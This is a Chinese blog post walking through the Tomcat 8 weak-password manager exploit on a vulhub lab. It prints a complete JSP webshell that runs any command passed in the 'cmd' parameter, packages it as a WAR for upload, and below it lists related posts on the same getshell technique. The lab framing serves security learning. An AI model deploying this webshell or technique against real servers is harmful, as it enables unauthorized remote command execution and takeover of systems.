tomcat8漏洞复现(后台getshell)

已于 2022-11-02 17:33:06 修改
阅读量527 收藏 1
点赞数
文章标签: java 前端 web安全
于 2022-11-01 13:15:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51692662/article/details/127631671
版权

这里用的是vulhub靶场

用弱口令登录就行

先准备jsp一句话

<%@ page language="java" contentType="text/html; charset=GBK"
pageEncoding="UTF-8"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>一句话木马</title>
</head>

<body>
<%
if ("admin".equals(request.getParameter("pwd"))) {
java.io.InputStream input = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int len = -1;
byte[] bytes = new byte[4092];
out.print("<pre>");
while ((len = input.read(bytes)) != -1) {
out.println(new String(bytes, "GBK"));
}
out.print("</pre>");
}
%>
</body>

</html>

再压缩为zip,最后打包为war

如果安装java,在window下用命令打包 jar cvf pp.war pp.jsp 

上传war文件

977003f75149440c85063972961453a8.png

 上传成功

 48184d6c43a845e694df1594dc1e3003.png

 利用

 2d93ce98b49342488ec83d183b4c38a7.png

 这里主要学习一种后台getshell方法,有些后台只能上传zip,war文件且内部会自动解压。这时候需要将一句话木马文件压缩。

安全~小菜鸡
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Tomcat漏洞总结.rar
12-19
tomcat 漏洞总结 包括后台暴力破解 幽灵猫getshell war包getshell 任意文件上传
帆软V9getshell1
08-03
帆软 V9getshell注意: 这个漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 jsp 文件进行覆盖 Tomcat启动帆软后默认存在的 JSP 文件
tomcat8 后台getshell漏洞
weixin_54786196的博客
09-03 259
打开哥斯拉 生成jsp木马并保存。在url栏加上jmuma.jsp。找到刚刚jsp木马存放的位置。此时制连接,用哥斯拉连接。将zip后缀改为war。在此位置上传war包。
Tomcat弱口令后台部署war包getshell
qq_59102311的博客
04-24 2138
3.点击Manager App,跳转http://127.0.0.1:8080/manager/html,要求登录验证。6.使用auxiliary/scanner/http/tomcat_mgr_login模块,查看详细信息。1.进入/vulhub/tomcat/tomcat8目录,启动docker。8.运行模块,爆破得出用户名和密码:tomcat:tomcat。13. 打开蚁剑,输入url,密码cmd,成功getshell。11.使用cmd命令,将jsp文件打包成war包。7.设置目标IP和目标端口。
Tomcat+弱口令&后台Getshell漏洞
weixin_60329395的博客
08-03 1190
漏洞影响范围:Tomcat 8.0版本、漏洞类型:弱口令、任意文件上传、漏洞成因:在tomcat8环境下,默认的后台密码为tomcat:tomcat,未修改默认密码就会造成未经授权的后台访问。后台存在war包绕过
Tomcat7部署war包getshell 漏洞
Boom!脑洞大爆炸的博客
07-07 926
Tomcat7部署war包getshell 漏洞
漏洞Tomcat后台War包上传Getshell
Blood_Pupil的博客
03-19 7073
注意标题,后台War包上传Getshell!这种方法的利用上下文是你已经能够登录Tomcat的管理后台,注意是Tomcat的管理后台而不是Web应用程序的后台!本文章一切演示以vuln提供的漏洞环境为例 Tomcat后台 使用本文所描述的技能的前提是先进入Tomcat的管理后台,那么Tomcat管理后台的URI你知道吗?有哪些限制阻止你登录后台,你知道吗?正所谓知己知彼百战不殆,那不如我们首先...
Tomcat8 + 弱口令 && 后台getshell 漏洞
yzl_007的博客
08-08 2741
Tomcat8 + 弱口令 && 后台getshell 漏洞 环境开启 启动docker开启镜像环境 vulhub镜像中的tomcat8文件目录下,docker-compose up -d 成功在主机上访问到 漏洞 根据弱密码tomcat/tomcat登陆管理后台 或者使用tomcat爆破工具 在下面位置可以找到上传点 <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!cl
Tomcat8弱口令+后台getshell
cyynid的博客
03-13 201
用户权限在可以看出,tomcat用户具有上述所有权限,密码为tomcat。默认情况下,通过常规安装在Tomcat8中没有用户,并且管理器页面仅允许访问本地IP。只有管​​理员手动修改了这些属性,我们才可以发起攻击。前提条件:Tomcat版本8.0 默认安装是没有用户的,密码是tomcat
漏洞Tomcat弱口令+后台getshell
m0_52450604的博客
02-07 657
漏洞Tomcat弱口令+后台getshell
Tomcat 弱口令 && 后台getshell漏洞
weixin_46601374的博客
04-05 7518
漏洞编号 VUL-2021040008 爆发时间 2018-10-10 漏洞简介 Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。 影响版本 Tomcat8.x,Tomcat7.x 漏洞详情 Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。 Tomcat7+权限分为: manager(后台管理) 1、manager-gui 拥
Tomcat7+ 弱口令 && 后台getshell漏洞
weixin_45653478的博客
05-11 987
Tomcat 是一个流行的开源Web应用服务器,用于部署和运行Java Web应用程序。Tomcat 7+ 版本中存在一个安全隐患,即默认的管理员密码可能较弱或者未被修改,攻击者可以利用这一漏洞登录到Tomcat的管理后台,并上传恶意的WAR包来执行任意代码。
tomcat7,tomcat8,tomcat9
02-04
Tomcat7、Tomcat8和Tomcat9是不同版本的Tomcat,每个版本都有其特性和改进。 **Tomcat7**: Tomcat7是2011年发布的,它主要支持Java Servlet 3.0和JSP 2.2规范。这个版本引入了一些重要改进,包括增强的安全性、更...
12. Hibernate 模板设计模式
最新发布
这是一个web全栈开发的博客,取其精华去其糟粕,争取让大家一看就懂,一学就会,一用就成~
07-22 728
如何运用模板设计模式重构 Hibernate 操作流程;持久化对象与序列化接口;OOP中有一个编码原则 :写仅写一次。翻译过来就是,不要重,要重用。答案是:使用模板设计模式进一步封装Hibernate的操作。在真实项目中,Hibernate仅仅只是完成项目中的一部分工作,需要和其它,如Spring等框架联合工作,一起承担整体项目的开发。Spring框架中就提供的有Hibernate模板对象。一个常规的、频繁的操作代码中,大部分代码不需要变动,只有小部分代码需要根据需求变动。
Promise 详解(原理篇)
山重水复疑无路,柳暗花明又一村。
07-20 690
Promise 是一种异步编程的解决方案。在异步操作中,callback 会导致回调地狱的问题,Promise 解决了这个问题。一个 Promise对象有以下三种状态:pending:初始状态,既不是成功,也不是失败状态。:意味着操作成功完成。rejected:意味着操作失败。当 new Promise() 被实例化后,即表示 Promise 进入 pending 初始化状态,准备就绪,等待运行。
Java内存模型
weixin_44267758的博客
07-19 709
此处的变量不是指java编程中的变量,它包括了实例字段,静态字段和构成数值对象的元素,但不包括局部变量和方法参数。JMM规定所有变量都存储在主内存中。每条线程有自己的工作内存,工作内存中保留了该线程使用到变量的主内存的副本。线程对变量的所有操作都必须在工作内存中进行,不能直接读写主内存的变量,不同的线程间也无法直接访问对方工作内存的变量,线程之间的变量值传递需要通过主内存来完成。
tomcat服务器漏洞
06-06
为了Tomcat服务器漏洞,你需要先了解Tomcat服务器中存在的漏洞类型及其对应的漏洞代码,然后通过构造特定的http请求来触发漏洞。 以下是一个简单的漏洞步骤: 1. 确认Tomcat的版本和具体漏洞类型,可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值